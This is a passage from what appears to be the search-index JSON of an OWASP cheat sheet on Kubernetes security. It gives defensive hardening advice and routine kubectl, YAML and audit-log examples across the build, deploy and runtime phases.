"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#controlling-access-to-the-kubelet","title":"Controlling access to the Kubelet","text":"

Kubelets expose HTTPS endpoints which grant powerful control over the node and containers. By default Kubelets allow unauthenticated access to this API. Production clusters should enable Kubelet authentication and authorization.

For more information, refer to Kubelet authentication/authorization documentation at https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-dashboard","title":"Securing Kubernetes Dashboard","text":"

The Kubernetes dashboard is a webapp for managing your cluster. It is not a part of the Kubernetes cluster itself, it has to be installed by the owners of the cluster. Thus, there are a lot of tutorials on how to do this. Unfortunately, most of them create a service account with very high privileges. This caused Tesla and some others to be hacked via such a poorly configured K8s dashboard. (Reference: Tesla cloud resources are hacked to run cryptocurrency-mining malware - https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware/)

To prevent attacks via the dashboard, you should follow some tips:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-build-phase","title":"Kubernetes Security Best Practices: Build Phase","text":"

Securing containers and Kubernetes starts in the build phase with securing your container images. The two main things to do here are to build secure images and to scan those images for any known vulnerabilities.

A Container image is an immutable, lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings [https://www.docker.com/resources/what-container]. The image shares the kernel of the operating system present in its host machine.

Container images must be built using approved and secure base image that is scanned and monitored at regular intervals to ensure only secure and authentic images can be used within the cluster. It is recommended to configure strong governance policies regarding how images are built and stored in trusted image registries.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#ensure-that-only-authorized-images-are-used-in-your-environment","title":"Ensure That Only Authorized Images are used in Your Environment","text":"

Without a process that ensures that only images adhering to the organization\u2019s policy are allowed to run, the organization is open to risk of running vulnerable or even malicious containers. Downloading and running images from unknown sources is dangerous. It is equivalent to running software from an unknown vendor on a production server. Don\u2019t do that.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-registry-and-the-use-of-an-image-scanner-to-identify-known-vulnerabilities","title":"Container registry and the use of an image scanner to identify known vulnerabilities","text":"

Container registry is the central repository of container images. Based on the needs, we can utilize public repositories or have a private repository as the container registry. Use private registries to store your approved images - make sure you only push approved images to these registries. This alone reduces the number of potential images that enter your pipeline to a fraction of the hundreds of thousands of publicly available images.

Build a CI pipeline that integrates security assessment (like vulnerability scanning), making it part of the build process. The CI pipeline should ensure that only vetted code (approved for production) is used for building the images. Once an image is built, it should be scanned for security vulnerabilities, and only if no issues are found then the image would be pushed to a private registry, from which deployment to production is done. A failure in the security assessment should create a failure in the pipeline, preventing images with bad security quality from being pushed to the image registry.

Many source code repositories provide scanning capabilities (e.g. Github, GitLab), and many CI tools offer integration with open source vulnerability scanners such as Trivy or Grype.

There is work in progress being done in Kubernetes for image authorization plugins, which will allow preventing the shipping of unauthorized images. For more information, refer to the PR https://github.com/kubernetes/kubernetes/pull/27129.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-minimal-base-images-and-avoid-adding-unnecessary-components","title":"Use minimal base images and avoid adding unnecessary components","text":"

Avoid using images with OS package managers or shells because they could contain unknown vulnerabilities. If you must include OS packages, remove the package manager at a later step. Consider using minimal images such as distroless images, as an example.

Restricting what's in your runtime container to precisely what's necessary for your app is a best practice employed by Google and other tech giants that have used containers in production for many years. It improves the signal to noise of scanners (e.g. CVE) and reduces the burden of establishing provenance to just what you need.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#distroless-images","title":"Distroless images","text":"

Distroless images contains less packages compared to other images, and does not includes shell, which reduce the attack surface.

For more information on ditroless images, refer to https://github.com/GoogleContainerTools/distroless.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#scratch-image","title":"Scratch image","text":"

An empty image, ideal for statically compiled languages like Go. Because the image is empty - the attack surface it truly minimal - only your code!

For more information, refer to https://hub.docker.com/_/scratch

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-the-latest-imagesensure-images-are-up-to-date","title":"Use the latest images/ensure images are up to date","text":"

Ensure your images (and any third-party tools you include) are up to date and utilizing the latest versions of their components.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-deploy-phase","title":"Kubernetes Security Best Practices: Deploy Phase","text":"

Kubernetes infrastructure should be configured securely prior to workloads being deployed. From a security perspective, you first need visibility into what you\u2019re deploying \u2013 and how. Then you can identify and respond to security policy violations. At a minimum, you need to know:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-namespaces-to-properly-isolate-your-kubernetes-resources","title":"Use Kubernetes namespaces to properly isolate your Kubernetes resources","text":"

Namespaces give you the ability to create logical partitions and enforce separation of your resources as well as limit the scope of user permissions.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#setting-the-namespace-for-a-request","title":"Setting the namespace for a request","text":"

To set the namespace for a current request, use the --namespace flag. Refer to the following examples:

kubectl run nginx --image=nginx --namespace=<insert-namespace-name-here>\nkubectl get pods --namespace=<insert-namespace-name-here>\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#setting-the-namespace-preference","title":"Setting the namespace preference","text":"

You can permanently save the namespace for all subsequent kubectl commands in that context.

kubectl config set-context --current --namespace=<insert-namespace-name-here>\n

Validate it with the following command.

kubectl config view --minify | grep namespace:\n

Learn more about namespaces at https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#create-policies-to-govern-image-provenance-using-the-imagepolicywebhook","title":"Create policies to govern image provenance using the ImagePolicyWebhook","text":"

Prevent unapproved images from being used with the admission controller ImagePolicyWebhook to reject pods that use unapproved images including:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implement-continuous-security-vulnerability-scanning","title":"Implement Continuous Security Vulnerability Scanning","text":"

New vulnerabilities are published every day and containers might include outdated packages with recently-disclosed vulnerabilities (CVEs). A strong security posture will include regular production scanning, covering first-party containers (applications you have built and previously scanned) and third-party containers (sourced from trusted repository and vendors).

Open Source projects such as ThreatMapper can assist in identifying and prioritizing vulnerabilities.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#regularly-apply-security-updates-to-your-environment","title":"Regularly Apply Security Updates to Your Environment","text":"

In case vulnerabilities are found in running containers, it is recommended to always update the source image and redeploy the containers.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#note","title":"NOTE","text":"

Try to avoid direct updates to the running containers as this can break the image-container relationship.

Example: apt-update  \n

Upgrading containers is extremely easy with the Kubernetes rolling updates feature - this allows gradually updating a running application by upgrading its images to the latest version.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#assess-the-privileges-used-by-containers","title":"Assess the privileges used by containers","text":"

The set of capabilities, role bindings, and privileges given to containers can greatly impact your security risk. The goal here is to adhere to the principle of least privilege and provide the minimum privileges and capabilities that would allow the container to perform its intended function.

Pod Security Policies are one way to control the security-related attributes of pods, including container privilege levels. These can allow an operator to specify the following:

For more information on Pod security policies, refer to the documentation at https://kubernetes.io/docs/concepts/policy/pod-security-policy/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#apply-security-context-to-your-pods-and-containers","title":"Apply Security Context to Your Pods and Containers","text":"

A security context is a property defined in the deployment yaml. It controls the security parameters that will be assigned to the pod/container/volume. These controls can eliminate entire classes of attacks that depend on privileged access. Read-only root file systems, for example, can prevent any attack that depends on installing software or writing to the file system.

When designing your containers and pods, make sure that you configure the security context for your pods, containers and volumes to grant only the privileges needed for the resource to function. Some of the important parameters are as follows:

Security Context Setting Description SecurityContext->runAsNonRoot Indicates that containers should run as non-root user SecurityContext->Capabilities Controls the Linux capabilities assigned to the container. SecurityContext->readOnlyRootFilesystem Controls whether a container will be able to write into the root filesystem. PodSecurityContext->runAsNonRoot Prevents running a container with 'root' user as part of the pod

Here is an example for pod definition with security context parameters:

apiVersion: v1  kind: Pod  metadata:  name: hello-world  spec:  containers:  # specification of the pod\u2019s containers  \n# ...\n# ...\n# Security Context\nsecurityContext:  readOnlyRootFilesystem: true  runAsNonRoot: true\n

For more information on security context for Pods, refer to the documentation at https://kubernetes.io/docs/tasks/configure-pod-container/security-context

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implement-service-mesh","title":"Implement Service Mesh","text":"

A service mesh is an infrastructure layer for microservices applications that can help reduce the complexity of managing microservices and deployments by handling infrastructure service communication quickly, securely and reliably. Service meshes are great at solving operational challenges and issues when running containers and microservices because they provide a uniform way to secure, connect and monitor microservices. Service mesh provides the following advantages:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#observability","title":"Observability","text":"

Service Mesh provides tracing and telemetry metrics that make it easy to understand your system and quickly root cause any problems.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#security","title":"Security","text":"

A service mesh provides security features aimed at securing the services inside your network and quickly identifying any compromising traffic entering your cluster. A service mesh can help you more easily manage security through mTLS, ingress and egress control, and more.

Securing microservices is hard. There are a multitude of tools that address microservices security, but service mesh is the most elegant solution for addressing encryption of on-the-wire traffic within the network.

Service mesh provides defense with mutual TLS (mTLS) encryption of the traffic between your services. The mesh can automatically encrypt and decrypt requests and responses, removing that burden from the application developer. It can also improve performance by prioritizing the reuse of existing, persistent connections, reducing the need for the computationally expensive creation of new ones. With service mesh, you can secure traffic over the wire and also make strong identity-based authentication and authorizations for each microservice.

We see a lot of value in this for enterprise companies. With a good service mesh, you can see whether mTLS is enabled and working between each of your services and get immediate alerts if security status changes.

Service mesh adds a layer of security that allows you to monitor and address compromising traffic as it enters the mesh. Istio integrates with Kubernetes as an ingress controller and takes care of load balancing for ingress. This allows you to add a level of security at the perimeter with ingress rules. Egress control allows you to see and manage external services and control how your services interact with them.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#operational-control","title":"Operational Control","text":"

A service mesh allows security and platform teams to set the right macro controls to enforce access controls, while allowing developers to make customizations they need to move quickly within these guardrails.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#rbac","title":"RBAC","text":"

A strong Role Based Access Control (RBAC) system is arguably one of the most critical requirements in large engineering organizations, since even the most secure system can be easily circumvented by overprivileged users or employees. Restricting privileged users to least privileges necessary to perform job responsibilities, ensuring access to systems are set to \u201cdeny all\u201d by default, and ensuring proper documentation detailing roles and responsibilities are in place is one of the most critical security concerns in the enterprise.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#disadvantages","title":"Disadvantages","text":"

Along with the many advantages, Service mesh also brings in its set of challenges, few of them are listed below:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implementing-centralized-policy-management","title":"Implementing centralized policy management","text":"

There are numerous projects which are able to provide centralized policy management for a Kubernetes cluster, most predominantly the Open Policy Agent (OPA) project, Kyverno, or Validating Admission Policy (a built-in, yet alpha (aka off by default) feature as of 1.26). In order to provide some depth, we will focus on OPA for the remainder of this cheat sheet.

OPA is a project that started in 2016 aimed at unifying policy enforcement across different technologies and systems. It can be used to enforce policies on their platforms (like Kubernetes clusters). When it comes to Kubernetes, RBAC and Pod security policies to impose fine-grained control over the cluster. But again, this will only apply to the cluster but not outside the cluster. That\u2019s where Open Policy Agent (OPA) comes into play. OPA was introduced to create a unified method of enforcing security policy in the stack.

OPA is a general-purpose, domain-agnostic policy enforcement tool. It can be integrated with APIs, the Linux SSH daemon, an object store like CEPH, etc. OPA designers purposefully avoided basing it on any other project. Accordingly, the policy query and decision do not follow a specific format. That is, you can use any valid JSON data as request attributes as long as it provides the required data. Similarly, the policy decision coming from OPA can also be any valid JSON data. You choose what gets input and what gets output. For example, you can opt to have OPA return a True or False JSON object, a number, a string, or even a complex data object. Currently, OPA is part of CNCF as an incubating project.

Most common use cases of OPA:

OPA enables you to accelerate time to market by providing pre-cooked authorization technology so you don\u2019t have to develop it from scratch. It uses a declarative policy language purpose built for writing and enforcing rules such as, \u201cAlice can write to this repository,\u201d or \u201cBob can update this account.\u201d It comes with a rich suite of tooling to help developers integrate those policies into their applications and even allow the application\u2019s end users to contribute policy for their tenants as well.

If you have homegrown application authorization solutions in place, you may not want to rip them out to swap in OPA. At least not yet. But if you are going to be decomposing those monolithic apps and moving to microservices to scale and improve developer efficiency, you\u2019re going to need a distributed authorization system and OPA (or one of the related competitors) could be the answer.

Kubernetes has given developers tremendous control over the traditional silos of compute, networking and storage. Developers today can set up the network the way they want and set up storage the way they want. Administrators and security teams responsible for the well-being of a given container cluster need to make sure developers don\u2019t shoot themselves (or their neighbors) in the foot.

OPA can be used to build policies that require, for example, all container images to be from trusted sources, that prevent developers from running software as root, that make sure storage is always marked with the encrypt bit, that storage does not get deleted just because a pod gets restarted, that limits internet access, etc.

OPA integrates directly into the Kubernetes API server, so it has complete authority to reject any resource\u2014whether compute, networking, storage, etc.\u2014that policy says doesn\u2019t belong in a cluster. Moreover, you can expose those policies earlier in the development lifecycle (e.g. the CICD pipeline or even on developer laptops) so that developers can receive feedback as early as possible. You can even run policies out-of-band to monitor results so that administrators can ensure policy changes don\u2019t inadvertently do more damage than good.

And finally, many organizations are using OPA to regulate use of service mesh architectures. So, even if you\u2019re not embedding OPA to implement application authorization logic (the top use case discussed above), you probably still want control over the APIs microservices. You can execute and achieve that by putting authorization policies into the service mesh. Or, you may be motivated by security, and implement policies in the service mesh to limit lateral movement within a microservice architecture. Another common practice is to build policies into the service mesh to ensure your compliance regulations are satisfied even when modification to source code is involved.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#limiting-resource-usage-on-a-cluster","title":"Limiting resource usage on a cluster","text":"

Resource quota limits the number or capacity of resources granted to a namespace. This is most often used to limit the amount of CPU, memory, or persistent disk a namespace can allocate, but can also control how many pods, services, or volumes exist in each namespace.

Limit ranges restrict the maximum or minimum size of some of the resources above, to prevent users from requesting unreasonably high or low values for commonly reserved resources like memory, or to provide default limits when none are specified

An option of running resource-unbound containers puts your system in risk of DoS or \u201cnoisy neighbor\u201d scenarios. To prevent and minimize those risks you should define resource quotas. By default, all resources in Kubernetes cluster are created with unbounded CPU and memory requests/limits. You can create resource quota policies, attached to Kubernetes namespace, in order to limit the CPU and memory a pod is allowed to consume.

The following is an example for namespace resource quota definition that will limit number of pods in the namespace to 4, limiting their CPU requests between 1 and 2 and memory requests between 1GB to 2GB.

compute-resources.yaml:

apiVersion: v1  kind: ResourceQuota  metadata:  name: compute-resources  spec:  hard:  pods: \"4\"  requests.cpu: \"1\"  requests.memory: 1Gi  limits.cpu: \"2\"  limits.memory: 2Gi\n

Assign a resource quota to namespace:

kubectl create -f ./compute-resources.yaml --namespace=myspace\n

For more information on configuring resource quotas, refer to the Kubernetes documentation at https://kubernetes.io/docs/concepts/policy/resource-quotas/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-network-policies-to-control-traffic-between-pods-and-clusters","title":"Use Kubernetes network policies to control traffic between pods and clusters","text":"

Running different applications on the same Kubernetes cluster creates a risk of one compromised application attacking a neighboring application. Network segmentation is important to ensure that containers can communicate only with those they are supposed to.

By default, Kubernetes allows every pod to contact every other pod. Traffic to a pod from an external network endpoint outside the cluster is allowed if ingress from that endpoint is allowed to the pod. Traffic from a pod to an external network endpoint outside the cluster is allowed if egress is allowed from the pod to that endpoint.

Network segmentation policies are a key security control that can prevent lateral movement across containers in the case that an attacker breaks in. One of the challenges in Kubernetes deployments is creating network segmentation between pods, services and containers. This is a challenge due to the \u201cdynamic\u201d nature of container network identities (IPs), along with the fact that containers can communicate both inside the same node or between nodes.

Users of Google Cloud Platform can benefit from automatic firewall rules, preventing cross-cluster communication. A similar implementation can be deployed on-premises using network firewalls or SDN solutions. There is work being done in this area by the Kubernetes Network SIG, which will greatly improve the pod-to-pod communication policies. A new network policy API should address the need to create firewall rules around pods, limiting the network access that a containerized can have.

The following is an example of a network policy that controls the network for \u201cbackend\u201d pods, only allowing inbound network access from \u201cfrontend\u201d pods:

POST /apis/net.alpha.kubernetes.io/v1alpha1/namespaces/tenant-a/networkpolicys  {  \"kind\": \"NetworkPolicy\",\n\"metadata\": {\n\"name\": \"pol1\"\n},\n\"spec\": {\n\"allowIncoming\": {\n\"from\": [{\n\"pods\": { \"segment\": \"frontend\" }\n}],\n\"toPorts\": [{\n\"port\": 80,\n\"protocol\": \"TCP\"\n}]\n},\n\"podSelector\": {\n\"segment\": \"backend\"\n}\n}\n}\n

For more information on configuring network policies, refer to the Kubernetes documentation at https://kubernetes.io/docs/concepts/services-networking/network-policies.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-data","title":"Securing data","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#keep-secrets-as-secrets","title":"Keep secrets as secrets","text":"

In Kubernetes, a Secret is a small object that contains sensitive data, like a password or token. It is important to understand how sensitive data such as credentials and keys are stored and accessed. Even though a pod is not able to access the secrets of another pod, it is crucial to keep the secret separate from an image or pod. Otherwise, anyone with access to the image would have access to the secret as well. Complex applications that handle multiple processes and have public access are especially vulnerable in this regard. It is best for secrets to be mounted into read-only volumes in your containers, rather than exposing them as environment variables.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#encrypt-secrets-at-rest","title":"Encrypt secrets at rest","text":"

The etcd database in general contains any information accessible via the Kubernetes API and may grant an attacker significant visibility into the state of your cluster.

Always encrypt your backups using a well reviewed backup and encryption solution, and consider using full disk encryption where possible.

Kubernetes supports encryption at rest, a feature introduced in 1.7, and v1 beta since 1.13. This will encrypt Secret resources in etcd, preventing parties that gain access to your etcd backups from viewing the content of those secrets. While this feature is currently beta, it offers an additional level of defense when backups are not encrypted or an attacker gains read access to etcd.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#alternatives-to-kubernetes-secret-resources","title":"Alternatives to Kubernetes Secret resources","text":"

You may want to consider using an external secrets manager to store and manage your secrets rather than storing them in Kubernetes Secrets. This provides a number of benefits over using Kubernetes Secrets, including the ability to manage secrets across multiple clusters (or clouds), and the ability to manage and rotate secrets centrally.

For more information on Secrets and their alternatives, refer to the documentation at https://kubernetes.io/docs/concepts/configuration/secret/.

Also see the Secrets Management cheat sheet for more details and best practices on managing secrets.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#finding-exposed-secrets","title":"Finding exposed secrets","text":"

Open-source tools such as SecretScanner and ThreatMapper can scan container filesystems for sensitive resources, such as API tokens, passwords, and keys. Such resources would be accessible to any user who had access to the unencrypted container filesystem, whether during build, at rest in a registry or backup, or running.

Review the secret material present on the container against the principle of 'least priviledge', and to assess the risk posed by a compromise.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-runtime-phase","title":"Kubernetes Security Best Practices: Runtime Phase","text":"

The runtime phase exposes containerized applications to a slew of new security challenges. Your goal here is to both gain visibility into your running environment and detect and respond to threats as they arise.

Proactively securing your containers and Kubernetes deployments at the build and deploy phases can greatly reduce the likelihood of security incidents at runtime and the subsequent effort needed to respond to them.

First, you must monitor the most security-relevant container activities, including:

Observing container behavior to detect anomalies is generally easier in containers than in virtual machines because of the declarative nature of containers and Kubernetes. These attributes allow easier introspection into what you have deployed and its expected activity.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-pod-security-policies-to-prevent-risky-containerspods-from-being-used","title":"Use Pod Security Policies to prevent risky containers/Pods from being used","text":"

PodSecurityPolicy is a cluster-level resources available in Kubernetes (via kubectl) that is highly recommended. You must enable the PodSecurityPolicy admission controller to use it. Given the nature of admission controllers, you must authorize at least one policy - otherwise no pods will be allowed to be created in the cluster.

Pod Security Policies address several critical security use cases, including:

For more information on Pod security policies, refer to the documentation at https://kubernetes.io/docs/concepts/policy/pod-security-policy/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-runtime-security","title":"Container Runtime Security","text":"

Hardening containers at runtime gives security teams the ability to detect and respond to threats and anomalies while the containers or workloads are in a running state. This is typically carried out by intercepting the low-level system calls and looking for events that may indicate compromise. Some examples of events that should trigger an alert would include:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-sandboxing","title":"Container Sandboxing","text":"

Container runtimes typically are permitted to make direct calls to the host kernel then the kernel interacts with hardware and devices to respond to the request. Cgroups and namespaces exist to give containers a certain amount of isolation but the still kernel presents a large attack surface area. Often times in multi-tenant and highly untrusted clusters an additional layer of sandboxing is required to ensure container breakout and kernel exploits are not present. Below we will explore a few OSS technologies that help further isolate running containers from the host kernel:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#preventing-containers-from-loading-unwanted-kernel-modules","title":"Preventing containers from loading unwanted kernel modules","text":"

The Linux kernel automatically loads kernel modules from disk if needed in certain circumstances, such as when a piece of hardware is attached or a filesystem is mounted. Of particular relevance to Kubernetes, even unprivileged processes can cause certain network-protocol-related kernel modules to be loaded, just by creating a socket of the appropriate type. This may allow an attacker to exploit a security hole in a kernel module that the administrator assumed was not in use.

To prevent specific modules from being automatically loaded, you can uninstall them from the node, or add rules to block them. On most Linux distributions, you can do that by creating a file such as /etc/modprobe.d/kubernetes-blacklist.conf with contents like:

# DCCP is unlikely to be needed, has had multiple serious\n# vulnerabilities, and is not well-maintained.\nblacklist dccp\n\n# SCTP is not used in most Kubernetes clusters, and has also had\n# vulnerabilities in the past.\nblacklist sctp\n

To block module loading more generically, you can use a Linux Security Module (such as SELinux) to completely deny the module_request permission to containers, preventing the kernel from loading modules for containers under any circumstances. (Pods would still be able to use modules that had been loaded manually, or modules that were loaded by the kernel on behalf of some more-privileged process.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#compare-and-analyze-different-runtime-activity-in-pods-of-the-same-deployments","title":"Compare and analyze different runtime activity in pods of the same deployments","text":"

Containerized applications are replicated for high availability, fault tolerance, or scale reasons. Replicas should behave nearly identically; replicas with significant deviations from the others warrant further investigation. Integrate your Kubernetes security tool with other external systems (email, PagerDuty, Slack, Google Cloud Security Command Center, SIEMs [security information and event management], etc.) and leverage deployment labels or annotations to alert the team responsible for a given application when a potential threat is detected. Commercial Kubernetes security vendors should support a wide array of integrations with external tools

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#monitor-network-traffic-to-limit-unnecessary-or-insecure-communication","title":"Monitor network traffic to limit unnecessary or insecure communication","text":"

Observe your active network traffic and compare that traffic to what is allowed based on your Kubernetes network policies. Containerized applications typically make extensive use of cluster networking, and observing active networking traffic is a good way to understand how applications interact with each other and identify unexpected communication.

At the same time, comparing the active traffic with what\u2019s allowed gives you valuable information about what isn\u2019t happening but is allowed. With that information, you can further tighten your allowed network policies so that it removes superfluous connections and decreases your attack surface.

Open source projects like https://github.com/kinvolk/inspektor-gadget or https://github.com/deepfence/PacketStreamer may help with this, and commercial security solutions provide varying degrees of container network traffic analysis.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#if-breached-scale-suspicious-pods-to-zero","title":"If breached, scale suspicious pods to zero","text":"

Use Kubernetes native controls to contain a successful breach by automatically instructing Kubernetes to scale suspicious pods to zero or kill then restart instances of breached applications.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#rotate-infrastructure-credentials-frequently","title":"Rotate infrastructure credentials frequently","text":"

The shorter the lifetime of a secret or credential the harder it is for an attacker to make use of that credential. Set short lifetimes on certificates and automate their rotation. Use an authentication provider that can control how long issued tokens are available and use short lifetimes where possible. If you use service account tokens in external integrations, plan to rotate those tokens frequently. For example, once the bootstrap phase is complete, a bootstrap token used for setting up nodes should be revoked or its authorization removed.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#receiving-alerts-for-security-updates-and-reporting-vulnerabilities","title":"Receiving alerts for security updates and reporting vulnerabilities","text":"

Join the kubernetes-announce group (<https://kubernetes.io/docs/reference/issues-security/security/) for emails about security announcements. See the security reporting page (https://kubernetes.io/docs/reference/issues-security/security) for more on how to report vulnerabilities.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

Kubernetes supplies cluster-based logging, allowing to log container activity into a central log hub. When a cluster is created, the standard output and standard error output of each container can be ingested using a Fluentd agent running on each node into either Google Stackdriver Logging or into Elasticsearch and viewed with Kibana.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#enable-audit-logging","title":"Enable audit logging","text":"

The audit logger is a beta feature that records actions taken by the API for later analysis in the event of a compromise. It is recommended to enable audit logging and archive the audit file on a secure server

Ensure logs are monitoring for anomalous or unwanted API calls, especially any authorization failures (these log entries will have a status message \u201cForbidden\u201d). Authorization failures could mean that an attacker is trying to abuse stolen credentials.

Managed Kubernetes providers, including GKE, provide access to this data in their cloud console and may allow you to set up alerts on authorization failures.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#audit-logs","title":"Audit logs","text":"

Audit logs can be useful for compliance as they should help you answer the questions of what happened, who did what and when. Kubernetes provides flexible auditing of kube-apiserver requests based on policies. These help you track all activities in chronological order.

Here is an example of an audit log:

{\n\"kind\":\"Event\",\n\"apiVersion\":\"audit.k8s.io/v1beta1\",\n\"metadata\":{ \"creationTimestamp\":\"2019-08-22T12:00:00Z\" },\n\"level\":\"Metadata\",\n\"timestamp\":\"2019-08-22T12:00:00Z\",\n\"auditID\":\"23bc44ds-2452-242g-fsf2-4242fe3ggfes\",\n\"stage\":\"RequestReceived\",\n\"requestURI\":\"/api/v1/namespaces/default/persistentvolumeclaims\",\n\"verb\":\"list\",\n\"user\": {\n\"username\":\"user@example.org\",\n\"groups\":[ \"system:authenticated\" ]\n},\n\"sourceIPs\":[ \"172.12.56.1\" ],\n\"objectRef\": {\n\"resource\":\"persistentvolumeclaims\",\n\"namespace\":\"default\",\n\"apiVersion\":\"v1\"\n},\n\"requestReceivedTimestamp\":\"2019-08-22T12:00:00Z\",\n\"stageTimestamp\":\"2019-08-22T12:00:00Z\"\n}\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#define-audit-policies","title":"Define Audit Policies","text":"

Audit policy defines rules about what events should be recorded and what data they should include. The audit policy object structure is defined in the audit.k8s.io API group. When an event is processed, it's compared against the list of rules in order. The first matching rule sets the \"audit level\" of the event.

The known audit levels are as follows:

You can pass a file with the policy to kube-apiserver using the --audit-policy-file flag. If the flag is omitted, no events are logged. Note that the rules field must be provided in the audit policy file. A policy with no (0) rules is treated as illegal.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#understanding-logging","title":"Understanding Logging","text":"

One main challenge with logging Kubernetes is understanding what logs are generated and how to use them. Let\u2019s start by examining the Kubernetes logging architecture from a birds eye view.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-logging","title":"Container logging","text":"

The first layer of logs that can be collected from a Kubernetes cluster are those being generated by your containerized applications.

Manifest is as follows.

apiVersion: v1\nkind: Pod\nmetadata:\nname: example\nspec:\ncontainers:\n- name: example\nimage: busybox\nargs: [/bin/sh, -c, 'while true; do echo $(date); sleep 1; done']\n

To apply the manifest, run:

kubectl apply -f example.yaml\n

To take a look the logs for this container, run:

kubectl log <container-name> command.\n

Pod Manifest is as follows:

apiVersion: v1\nkind: Pod\nmetadata:\nname: example\nspec:\ncontainers:\n- name: example\nimage: busybox\nargs:\n- /bin/sh\n- -c\n- >\nwhile true;\ndo\necho \"$(date)\\n\" >> /var/log/example.log;\nsleep 1;\ndone\nvolumeMounts:\n- name: varlog\nmountPath: /var/log\n- name: sidecar\nimage: busybox\nargs: [/bin/sh, -c, 'tail -f /var/log/example.log']\nvolumeMounts:\n- name: varlog\nmountPath: /var/log\nvolumes:\n- name: varlog\nemptyDir: {}\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#node-logging","title":"Node logging","text":"

When a container running on Kubernetes writes its logs to stdout or stderr streams, the container engine streams them to the logging driver configured in Kubernetes.

In most cases, these logs will end up in the /var/log/containers directory on your host. Docker supports multiple logging drivers but unfortunately, driver configuration is not supported via the Kubernetes API.

Once a container is terminated or restarted, kubelet stores logs on the node. To prevent these files from consuming all of the host\u2019s storage, the Kubernetes node implements a log rotation mechanism. When a container is evicted from the node, all containers with corresponding log files are evicted.

Depending on what operating system and additional services you\u2019re running on your host machine, you might need to take a look at additional logs. For example, systemd logs can be retrieved using the following command:

journalctl -u\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#cluster-logging","title":"Cluster logging","text":"

On the level of the Kubernetes cluster itself, there is a long list of cluster components that can be logged as well as additional data types that can be used (events, audit logs). Together, these different types of data can give you visibility into how Kubernetes is performing as a ystem.

Some of these components run in a container, and some of them run on the operating system level (in most cases, a systemd service). The systemd services write to journald, and components running in containers write logs to the /var/log directory, unless the container engine has been configured to stream logs differently.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#events","title":"Events","text":"

Kubernetes events can indicate any Kubernetes resource state changes and errors, such as exceeded resource quota or pending pods, as well as any informational messages. Kubernetes events can indicate any Kubernetes resource state changes and errors, such as exceeded resource quota or pending pods, as well as any informational messages.

The following command returns all events within a specific namespace:

